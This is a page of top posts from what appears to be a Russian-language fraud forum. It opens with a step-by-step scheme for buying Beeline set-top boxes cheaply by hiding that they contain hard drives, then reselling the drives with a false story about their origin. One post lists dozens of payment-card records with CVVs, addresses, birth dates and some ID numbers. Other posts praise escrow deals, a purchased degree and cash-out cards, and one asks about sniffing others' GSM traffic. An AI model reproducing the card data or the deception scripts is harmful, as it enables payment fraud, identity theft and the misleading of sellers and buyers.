    Все знакомы с провайдером интернета «Билайн», одним из лидеров рынка. При подключение цифрового TV они дают в аренду приставку и почти все они идут с функцией записи видео. Многие, в силу менталитета, после окончания пользования услугами провайдера «забывают» их отдавать и они пылятся где-нибудь в кладовке или на балконе. Теперь о самом главном. В каждой такой приставке стоит жесткий диск на 320гб 3,5 дюйма, реже 2,5 дюйма. За ними-то мы и охотимся. Данные диски в магазине стоят от 3,5к и выше. Почти все владельцы приставок, даже и не подозревают, что внутри приставки есть что то ценное, поэтому наша схема и работает Опишу поэтапно действия: 1 . Объявление о покупке Его лучше подавать в газеты объявлений, которые бесплатно раскидываются по ящикам во всех районах города. Да, оно относительно дороже, чем аналогичные объявление в газетах объявлений, которые продаются в ларьках, но с них эффект значительно выше. На моем примере: я подаю объявление такого характера, в разделе «Бытовая техника куплю» пишу только «Приставку Билайн», это значительно позволяет сэкономить на стоимости . Этого вполне достаточно, чтобы клиент среагировал на текст. У нас в городе с населением в 600к, таких бесплатных основных газет две. По цене выходит 1300р и 1100р. 3 выпуска в неделю во все районы, на 3 недели подряд. Изначально на подачу нужно от 2,5к. Можете экспериментировать. Заказать расклейку объявлений в периферийных районах, это также очень эффективный способ, который окупится после покупки 2-3 приставок. Не надо раскидывать это объявление на авито и Вконтакте, так как оно не будет иметь ни какого эффекта, но при этом найдется много умников которые могут взять эту идею, и составить конкуренцию. 2. Работа со звонками Звонков будет очень много, ибо эти приставки лежат чуть ли не у каждого второго. Изначально устанавливаем цену на приставку 500р. При назначении такой цены, нужно учесть то, что они годами лежат, пылятся у людей и занимают место, а выкинуть жалко. 500р. – это для 80% населения деньги. Исходя из практики, 90% позвонивших, отдаст ее вам за 500р., а оставшиеся 10% не отдадут и за 1500р. При звонке, обязательно акцентируйте внимание на том, что она вам нужна только на запчасти и не обязательна полная комплектация. При этом никогда не говорите, что хотите достать жесткий из нее. Изначально я всегда уточняю модель приставки и всегда делаю акцент на том, что она старая. Например: - У вас какая модель, Motorola или Cisco? - Я не знаю - Корпус пластиковый или металлический? - Металлический - Ну понятно, Motorola, старая модель, мы их по 500р. берем Естественно, если он говорит, что пластиковый, то мы отвечаем то же самое. Можете назначать удобное место вам при покупке, но учтите, что это значительно понижает шансы на то что клиент приедет. Лично я выписываю номера в блокнот всех, с адресами где их забрать и потом объезжаю, это чуть ли в два раза увеличивает количество. Интересуйтесь также, нет ли у них роутера «Билайн», для чего - описание ниже. 3. При покупке Очень редко, когда вам приносят только одну приставку. Обычно это коробка от нее в которой полный набор шнуров, коммутатор, пачкорды, шнур HDMI. Так же интересуйтесь между делом, не остался ли у них билайновский WIFIроутер, его забирайте до 200р., будьте уверены, они вам его отдадут за эту цену, т.к. он тоже просто валяется. Забирайте у них все, позже опишу, для чего. Визуальный осмотр 3.1 Если это MotorolaVIP2262, то если на нее смотреть сверху, сразу видно наличие жесткого диска. Крышка сверху металлическая, по этому признаку ее легко классифицировать и нужно забирать всегда. Там он в основном бывает размера 3,5 дюйма 320гб, реже встречается 2,5дюйма (ноутбучный), вероятность примерно 80/20%. Фирмы жестких могут быть Hitachi или Seagate все на 320гб. 3.2 Если это Cisco7031(старая), то нужно перевернуть приставку вверх дном и там так же через решетку будет видна гриновскаяWDна 320гб, она кстати более ценится чем HitachiилиSeagate. Читал что иногда встречаются диски в таких приставках на 160гб, но ни разу этого не встречал. Объем харада, в такой приставке можно также увидеть через решетку. 3.3 Cisco 2230 Самая вкусная) Там только используются жесткие размера 2,5дюйма (для ноутов) и объемом 320гб. Визуально наличие ни как не определишь, он там точно есть. Уточняйте модель заранее, есть Cisco2220, визуально ничем не отличимая от 2230, но в ней нет жесткого диска. 4. Разборка и предпродажная подготовка Самый простой вариант в разборке, это Motorola. Для этого нужна средняя крестовая отвертка. Потребуется открутить 12 винтов и хард на свободе. Предварительно отстегните питание от него и Sata шлейф. Винт в идеальном состоянии, но немного запылен, смахните пыль СУХОЙ салфеткой. Теперь с вариантами посложнее. Компания Cisco ставит пассивную защиту приставки от вскрытия. Болты уже не обычные крестовые, а звездочки с защитой. Я попробовал 3 набора таких отверток, не подошли. (возможно плохо искал). Я вскрываю их «варварским» методом. Модель Cisco 2232. Для этого потребуется только ножовка по металлу и крестовая отвертка. С углов, в пластиковом корпусе по шву, делаешь пропилы, пока не порежется стягивающий винт. Приставка раскрывается на две половинки, к верхней прикреплен винт. Отстегиваем шлейф SATA, здесь он комбинированный и тоже не выкидываем. 4 крестовых болта и винт свободен, в идеальном состоянии и даже без пыли. У меня извлечение занимает не более 5 минут Теперь про Cisco7031… Такое ощущение, что производители проектировали ее, с условием, использования ее при ядерном взрыве Даже если вы захотите разбить ее пластиковый корпус молотком, у вас ничего не получится. У нее все болты звездочки, даже внутри. Опять понадобится ножовка по металлу и пассатижи. Срезаем стягивающие винты и снимаем крышку. Жесткий заключен в металлические салазки и удерживается 4мя винтами. Их выкручиваем пассатижами. Шлейфы отстегиваем и откладываем. У меня все это занимает 10-15 минут. Вы скорее всего найдете свои способы разбора, я просто описал, что использую я. Извлеченные жесткие отправляем на тестирование. Для чего это нужно. Прежде всего для своей уверенности, что он рабочий при продаже. В тестировании нам поможет программа Victoria 4.3 В гугле очень много видео и инструкций, как ей пользоваться. Скачиваем версию которая работает из под винды и подцепляем жесткий через SATA к компу. Тестирование на блоки одного диска занимает около часа. По окончании делайте скриншот экрана, там будет серийный номер жесткого, время тестирования и его состояние. Все это сохраняем в отдельную папку. Диск форматируйте! Для чего это нужно? Иногда при покупке винта у вас начинают звонить и рассказывать что на ваш жесткий не запускается/имеет битые блоки и т.д. Скидываете скрин теста и закрываете этот вопрос. От себя, мне еще ни разу не попался не рабочий винт из приставки. Да были с битыми блоками, но в не критичном количестве 2-5, продавались на ура и нормально работают. Еще совет, ставьте небольшую галку маркером на проверенных, а то они имеют свойство путаться. Теперь про сопутку. Пачкорды, HDMI, шлейфы, блоки питания от приставки, коммутаторы, пульты, роутеры. Все это можно также легко продать и получить дополнительную прибыль. Все шнуры я аккуратно скручиваю и стягиваю компьютерными стяжками, они стоят копейки и придают товарный вид. 5. Продажа Нам тут потребуется только лишь сайт Авито. Как это делаю я. Важно: номера для газеты и для авито используем разные. Я коплю жестких 30-40шт. и только потом подаю объявление. В нем я указываю, что есть диски 2,5 и 3,5 дюйма. Обязательно фото хотя бы пары дисков, так же я добавляю один из скринов с Victoria, для того чтобы покупатель проникся доверием, так как продают очень много битого хлама. На следующий день объявление делаю с утра премиум и оно висит 7 дней вверху, стоит это 350р. За неделю их у вас разберут. Теперь по цене. Я устанавливаю чуть ниже половины магазинной цены. Ноутбучный выставляю 1600р., 3,5 дюйма 1200-1300р. Гриновские WD из Cisco 7031 продаю по 1400р. Важно! При вопросе, откуда они, говорите с видеонаблюдения предприятия, которым почти не пользовались и обязательно форматируйте их перед продажей. Это необходимо, чтобы люди не поняли откуда они и у вас не появились лишние конкуренты. Наверняка у вас появятся постоянные покупатели из ремонтных компьютерных фирм, которые у вас будут забирать диски. Сейчас например, я в Авито объявление даже не подаю, у меня их забирают, заранее заказывая. Насыщения рынка в этом сегменте быть не может, так как жесткие сыпятся у людей каждый день, а новый стоит достаточно дорого. Еще козырь при продаже, они даже не работали и имеют состояние нового. Сопутка. Шнуры я также выставляю в полцены от ДНСкой. Роутеры легко улетают по 400-500р, коммутаторы по 200р. Можно выставить так же пульты по 200р., так как многие их теряют и ломают, а в Билайне они стоят круглую сумму. С одного комплекта при затрате 500р. на саму приставку и 200р. WIFIроутер, можно получить 1300р жесткий + 500р роутер + пачкорд 5м 100р + коммутатор 200р + HDMI 1,5м 200р. Итого почти 2к прибыли с одной приставки. Сами платы и приставки я не придумал, как использовать. Наверняка с ними тоже можно что-нибудь придумать, но я сам не вникал в эту тему. Обычно просто выкидываю, когда места на балконе не остается. Итог: отработал по этой схеме пятый месяц в 600 тысячном городе, спада не замечаю. В месяц стабильно забираю минимум 50 приставок. Когда замечу спад, воспользуюсь услугами компаний по расклейке объявлений (очень эффективный способ). Тема может жить в одном городе минимум год со стабильным доходом в 50-100к, при минимальных затратах. Собрать при желании 1000 приставок за год, совсем не сложно и реально и вот ваш миллион) При этом все легально и просто.
  17. 1 балл
  18. 1 балл
  19. 1 балл
    У меня получилась цена в 110к рублей итоговая, не могу сказать что это дорого или дешего, для меня 110к это не дорого, но для кого то наверное это большие деньги По итогу могу сказать , что со мной на славу поработали и теперь я собственно говоря сам уже работаю и у меня все получается А вы и дальше думайте ребзя ,стоит оно того или нет
  20. 1 балл
    Сработался с продавцом , надеюсь, что удастся поставить работу на поток
  21. 1 балл
    Полюбому, если бы все так просто было, обнальные карты бы не продавали , а сами налили
  22. 1 балл
    Спасибо,за сохраненные нервы ))
  23. 1 балл
  24. 1 балл
    У него лицо то прям террориста , его должны были в офлайне в КПЗ сажать и там допрашивать
  25. 1 балл
    Пару дней заняло обучение , ТС всегда был на связи и технически консультировал
  26. 1 балл
    Хера се , надо будет попробовать
  27. 1 балл
    БОЛЬШОЕ СПАСИБО!!! Первый раз воспользовался гарант сервисом и очень переживал, деньги то не малые перевел!!, но все прошло качественно и теперь у меня есть ВЫСШЕЕ образование !
  28. 1 балл
    Благодарю гарант за проведение сделки, быстро качественно и надежно))
  29. 1 балл
    Добрый день, хочу купитьу вас тему от Bingo, какую процедуру мне придется пройти? К чем у мне подготовится?
  30. 1 балл
    А почему именно авиабилеты?+ за статью
  31. 1 балл
    Можно более подробно? что и как? Был бы очень признателен!
  32. 1 балл
    Москва. 21 апреля. INTERFAX.RU - Находящийся в Таллине Центр кибер-сотрудничества НАТО проведете на этой неделе учения "Locked Shields 2015" с участием 400 представителей из 16 государств. "Это будут крупнейшие в мире учения подобного рода, в которых будут использованы реальные технологии, компьютерные сети и методы отражения кибер-нападений", - сообщили "Интерфаксу" во вторник в пресс-службе центра. Согласно сценарию учений, командам участников предстоит защищать компьютерные сети и информационные системы условного государства. Зарубежные атаки на него будут дополняться давлением со стороны СМИ и правовыми ограничениями. Цель - дать реалистичное представление о том, насколько большое воздействие могут оказать кибер-инциденты и насколько комплексными должны быть методы их решения. Центр кибер-сотрудничества НАТО проводит аналогичные учения с 2010 года. В этом году их поддерживает правительство Канады, которое финансирует пополнение используемых на них технических средств. Центр в Таллине является военной организацией, которая сосредоточена на исследовательских работах и подготовке кадров в области кибер-обороны. Целью Центра является улучшение деятельности, сотрудничества и обмена информацией НАТО, входящих в него государств и партнеров альянса.
  33. 1 балл
    MasterCard|5277294874106150|184|10/2017|Edward|G|Mach|Mírová 122|Nové Mesto na Morave|Kraj Vysočina|592 31|CZ|Czech Republic|569 271 463|1/16/1982| MasterCard|5426208453765673|356|11/2016|Steve|P|Morgan|50 Leisure Lane|Pismo Beach|CA|93449|US|United States|805-556-0474|10/17/1953|617-98-5357 Visa|4539996044366376|500|7/2019|Antonio|M|Ramos|37 rue Charles Corbeau|FLEURY-LES-AUBRAIS|Centre|45400|FR|France|02.93.04.47.08|10/5/1982| MasterCard|5148889976567287|306|12/2015|Derek|W|Diaz|Stationsvej 13|Hvalsø|Region Sjælland|4330|DK|Denmark|21-69-39-78|12/11/1962|111262-4119 Visa|4716856192720193|500|8/2016|Mike|J|Brewer|Stallstigen 50|GIMO||740 52|SE|Sweden|0174-2627006|5/28/1945|450528-0919 Visa|4539058719801862|875|8/2016|Annette|L|Johnson|137 Rue Ettatawer|Cite El Manai|Governorate Manouba|1142|TN|Tunisia|73 968 090|1/16/1991| MasterCard|5489999845477985|335|10/2017|Elizabeth|M|Kennedy|Δεληγιάννη 1|ΚΟΣΗ|Larnaca|7621|CY|Cyprus (Anglicized)|24 324118|1/16/1960| MasterCard|5485911103716289|037|8/2018|Linda|S|Fletcher|63 Rue Des Entrepreneurs|Cite Nesrine|Governorate Zaghouan|1100|TN|Tunisia|72 816 907|7/28/1984| MasterCard|5586309201547110|049|4/2017|David|R|Berry|Βερανζέρου 24|ΚΑΡΑΒΑΣ|Kyrenia|9200|CY|Cyprus (Anglicized)|27 878782|5/28/1959| MasterCard|5490027093018140|701|6/2019|Irene|E|Kelly|97 Newport Road|CARMEL||LL54 3DR|GB|United Kingdom|078 6625 1108|10/27/1937|HX 47 69 99 C Visa|4716063925802162|434|12/2017|Gay|P|Rodriguez|Gosposka ulica 52|Orehova vas||2312|SI|Slovenia|070-728-297|8/2/1931| MasterCard|5354199938694800|746|5/2017|Mildred|I|Chism|P.O. Box 294|Qeqertarsuaq|Qaasuitsup|3953|GL|Greenland|92 69 51|9/27/1964| MasterCard|5533158537112519|864|10/2017|Sabrina|W|Ellis|Ringlaan 476|Ebly|WHT|6860|BE|Belgium|0488 47 91 91|11/22/1952| Visa|4485130991255895|236|7/2018|Wesley|M|Enos|Escuadro 48|Carcaixent|Valencia|46740|ES|Spain|636 687 449|5/20/1979| Visa|4916635673839419|001|10/2019|Ruby|E|Cope|Dělnická 1212|Vsetín 1|Zlínský kraj|755 01|CZ|Czech Republic|606 422 541|7/22/1947| Visa|4539103382376428|246|3/2019|Lawrence|W|McGregor|Jõe 3|Ookatku|Jõgevamaa|48512|EE|Estonia|776 0374|2/9/1979| Visa|4716068348739594|144|10/2019|Mark|C|Barrett|Tavcarjeva 76|Selnica ob Dravi||2352|SI|Slovenia|070-952-619|8/29/1976| Visa|4485130415394148|206|2/2018|John|K|Albanese|295 King George Avenue|Mouttagiaka|Limassol|4527|CY|Cyprus (Anglicized)|99 188866|4/8/1980| Visa|4916396044225958|029|10/2017|Guadalupe|M|Knight|Nánási út 30.|Balatonfenyves|Somogy|8646|HU|Hungary|(85) 108-042|6/16/1939| Visa|4716547979106835|563|5/2017|Yvonne|A|Williams|Boulevard General Wahis 96|Mussy-la-Ville|WHT|6750|BE|Belgium|0470 23 00 36|8/19/1993| Visa|4532085542132311|671|4/2015|Linda|T|Wade|3099 Jasper Avenue|Edmonton|AB|T5J 3N2|CA|Canada|780-409-9304|3/19/1958|567 058 037 MasterCard|5234945936225112|453|1/2015|Randy|D|Hemphill|259 Star Trek Drive|Panama City|FL|32401|US|United States|850-360-1972|12/4/1983|767-48-2168 Visa|4532254082692429|081|6/2019|Lisa|C|Bryant|Augsburger Straße 66|Witten Stockum|NW|58454|DE|Germany|02302 74 92 33|9/25/1930| MasterCard|5223893893525673|439|9/2019|Ada|M|Dial|13 Ane Habib Bourguiba|Touajnia|Governorate Jendouba|8112|TN|Tunisia|78 614 419|9/16/1940| Visa|4916843831848518|380|4/2018|Robert|K|Kurtz|99 Minnehaha Avenue|Cornwallis|Waitakere|0604|NZ|New Zealand|(028) 1539-851|9/17/1946| MasterCard|5449119535194878|094|12/2017|William|G|Freeman|67 Rue El Abadlia|Haddada|Governorate Bizerte|7010|TN|Tunisia|72 930 009|3/3/1933| MasterCard|5126740476833545|712|8/2017|Leo|C|Follett|Lemesjö 35|INGMARSÖ||130 25|SE|Sweden|08-3056070|11/10/1955|551110-0058 Visa|4556776455237284|679|10/2018|Richard|C|Coon|Na Průhonu 1519|Trnová u Plzne|Plzeňský kraj|330 13|CZ|Czech Republic|370 003 334|4/10/1986| Visa|4532819160099471|424|4/2019|Brenda|J|Robinson|Tårup Byvej 43|København K|Region Sjælland|1259|DK|Denmark|42-36-10-00|1/29/1944|290144-3192 MasterCard|5167382823824693|321|4/2016|Kimberly|M|Hunter|225 Michalakopoulou Avenue|Prastio Kelokedaron|Paphos|8606|CY|Cyprus (Anglicized)|26 224205|11/16/1935| MasterCard|5529261598593811|997|2/2016|Sylvia|E|Banner|76 rue de Lille|ASNIÈRES-SUR-SEINE|Île-de-France|92600|FR|France|01.80.07.37.09|9/30/1936| Visa|4929890125983514|224|2/2016|Nancy|R|Woodward|4774 Reserve St|Denbigh|ON|K0H 1L0|CA|Canada|613-333-1099|10/12/1988|781 890
  34. 1 балл
    Получилось 50$ вывести,нужно чучуть доработать схему и тогда будет замечательная
  35. 1 балл
    ссылка не работает
  36. 1 балл
    Российского хакера обвиняют в преступном сговоре, взломе компьютерных систем и нескольких видах мошенничества. Федеральное бюро расследований США предлагает рекордное вознаграждение в $3 млн за информацию, которая поспособствует задержанию российского хакера Евгения Богачева. Его обвиняют в создании ботнета GameOver Zeus, с помощью которого киберпреступник похитил более $100 млн со счетов жертв за последние четыре года. Как сообщается в заявлении Государственного департамента США, «это предложение о вознаграждении еще раз подтверждает намерения правительства США привлечь к правосудию участников организованных преступных группировок, где бы они не скрывались». В настоящее время ФБР уверено, что Богачев до сих пор проживает в России. 31-летнего хакера обвиняют в преступном сговоре, взломе компьютерных систем, мошенничестве с использованием электронных коммуникаций, банковском мошенничестве и отмывании денег. Награда в размере $3 млн оказалась рекордной – раньше правительство США никогда не предлагало таких крупных сумм за поимку киберпреступников.
  37. 1 балл
    "само" дело никогда не пойдет, его нужно все время двигать.двигать
  38. 1 балл
    В квартире прописаны и реально живут мой муж,ребенок,мать мужа. Квартира не приватизирована. Помимо этого там прописаны сестра мужа и двое несовершеннолетних детей.В реальности они живут уже 17 лет в квартире мужа жены,которая в данный момент на него оформлена.Не так давно мать моего мужа умерла. Она была главным квартиросъемщиком.Вопрос. Кто будет главнм квартиросъемщиком,если желание имеют оба?И что это дает? Может ли сестра приватизировать свою часть жилплощади и в последствии продать? Чем вообще опасна такая ситуация,при том,что мира между семьями нет и чего ожидать неизвестно.
  39. 1 балл
    Точно. С Омерты. Копипасты видать ставить не принято.
  40. 1 балл
    Главным следственным управлением ГУ МВД России по региону возбуждено уголовное дело по факту незаконного обналичивания денежных средств в сумме более двух миллиардов рублей. Сотрудники областного управления экономической безопасности и противодействия коррупции получили оперативную информацию о том, что 44-летний учредитель одной из кемеровских консалтинговых фирм создал ряд организаций для осуществления банковской деятельности, не имея на то государственной лицензии. - Официальным источником дохода фирмы, которая, согласно учредительным документам, консультировала по вопросам коммерческой деятельности и управления, занималась финансовым посредничеством, бухучетом, аудитом и исследованием рыночной конъюнктуры, были сборы от аренды помещений и автотранспорта, - пояснила сотрудник отдела информации и общественных связей ГУ МВД РФ по Кемеровской области Татьяна Еременко. - В ее штате числилось более 20 специалистов различных направлений коммерческой деятельности. Фактически весь бухучет и аудит заключался в оказании как юрлицам, так и индивидуальным предпринимателям услуг по расчетно-кассовому обслуживанию, конвертации валюты, транзитному перечислению безналичных средств и их списанию. Делалось это с целью покупки банковских ценных бумаг от имени фирм-однодневок, зарегистрированных на родственников главного подозреваемого. А клиентами фирм, заключившими фиктивные договоры с целью вывода оборотных средств, стали свыше 70 предприятий Кузбасса. Среди них - крупные холдинговые компании угольной отрасли, а также бюджетные предприятия и организации, в том числе жилищно-коммунальной сферы. Часть доходов от внешнеторговых сделок выводилась через оффшорную компанию, у которой были открыты счета в одном из латвийских банков. По предварительным оценкам, за три года (с 2008-го по 2011-й) таким способом было обналичено (точнее, выведено из экономики региона и страны) более двух миллиардов рублей. На полученные преступным путем деньги приобретались недвижимость, доли в коммерческих структурах, а также автотранспорт и карьерная спецтехника. Согласно статье 172 УК РФ ("Незаконная банковская деятельность"), основному фигуранту грозит лишение свободы на срок до четырех лет, а также штраф.
  41. 1 балл
    купил бы за 10% от баланса
  42. 1 балл
    если бы я зашёл на сайт ФБР и увидел там свою фоту то мне было бы чертовски приятно, не зря работаю значит!! шутка зы спасибо за статью, полезная инфа
  43. 1 балл
  44. 1 балл
    Скажи провайдер лочит скайп или стесняешься мол разговоры пишутся,боишься прослушки)
  45. 1 балл
    Дамп не читает на сколько мне известно. Вообще дайте не много времени и я постараюсь выложить статью здесь об устройстве, что читает как читает и тд. На сегодняшний день знаю лишь что читается там карта (данные вида номер+имя), на счет цвв еще вопрос, на счет дампа тоже пока сомневаюсь.
  46. 1 балл
    Развод.Как уже писалось выше,человек который владеет инфой о догах не станет ей делиться.Так как он просто может сделать ставки в разных конторах и сорвать большие деньги,при этом ему не надо никого искать,тратить время и силы. Проверено на собственном опыте. И помните: Бесплатный сыр только в мышеловке.
  47. 1 балл
    Всё равно много денег не положешь...Ибо снимаются они со счёта владельца автомата,а счёт не резиновый
  48. 1 балл
  49. 1 балл
    Официальные лица западных стран единодушны в оценках приговора Михаилу Ходорковскому и Платону Лебедеву, который 30 декабря вынес Хамовнический районный суд Москвы. Западные страны подвергли резкой критике приговор Михаилу Ходорковскому и Платону Лебедеву, который 30 декабря вынес Хамовнический районный суд Москвы. В частности, один из высокопоставленных чиновников в администрации президента США Барака Обамы, имя которого не называется, высказал мнение, что приговор экс-главе ЮКОСа осложнит вступление России во Всемирную торговую организацию (ВТО), сообщает РИА "Новый регион". "Это не облегчит, а только усложнит процесс вступления (РФ в ВТО), - заявил чиновник, - ВТО существует на основе главенства права. Большинство стран по всему миру не рассматривают этот вердикт суда как признак углубления и укоренения верховенства права в России. Это, несомненно, отразится на репутации России". Также Reuters процитировало заявление на эту тему официального представителя Госдепартамента США Марка Тонера: "Мы остаемся обеспокоены серьезными нарушениями во время процесса и, по-видимому, использованием возможностей судебной системы в неподобающих целях, особенно сейчас, когда Ходорковского и Лебедева приговорили к максимальному наказанию". Канцлер Германии Ангела Меркель назвала решение Хамовнического районного суда политически мотивированным. "Остается впечатление, что в этом процессе сыграли роль политические мотивы. Это противоречит намерениям добиваться полного верховенства закона, которые часто декларирует Россия", - сказала Меркель. Она добавила, что разочарована приговором и считает его слишком жестким. По словам министра юстиции ФРГ Забине Лойтхойссер-Шнарренбергер, для нынешней российской власти такой человек как Ходорковский является политическим конкурентом и, в первую очередь, поэтому останется в тюрьме еще на несколько лет. Министр иностранных дел Великобритании Уильям Хейг в связи с новым приговором экс-главе ЮКОСа Михаилу Ходорковскому выразил озабоченность принципами правоприменения в России. "Я глубоко озабочен тем, какие последствия дело Михаила Ходорковского может иметь для доверия к принципам правоприменения в России", - говорится в заявлении министра, распространенном поздно вечером в четверг. Напомним, накануне Хамовнический районный суд Москвы приговорил Ходорковского и Лебедева к 14 годам лишения свободы каждого по совокупности двух приговоров. Экс-глава ЮКОСа, таким образом, сможет выйти на свободу лишь в 2017 году. Как сообщает "Инетерфакс", Ходорковский и Лебедев не будут подавать прошение о помиловании, но будут обжаловать решение суда.
  50. 1 балл
    Доброго времени суток всем! Знающие люди, подскажите есть ли в природе и в общем доступе какой-нибудь программный снифер для GSM-канала? Снифер по аналогии со снифером канала Wi-Fi и обычной ЛВС. Снифер хотелось бы в целях изучения исходящего/входящего трафика мобильного телефона. Просто хочеться увидеть, что из себя представляет голосовая цифровая передача, как шифруется, можно ли расшифровать голосовой пакет и т.п. Одним словом чистое любопытство, никакой прослушки и криминала. Хочеться понять, можно ли используя мобильный телефон и компьютерную программу перехватить свой трафик и трафик смежных волн радиоэфира, т.е. чужой трафик.
×
×
  • Создать...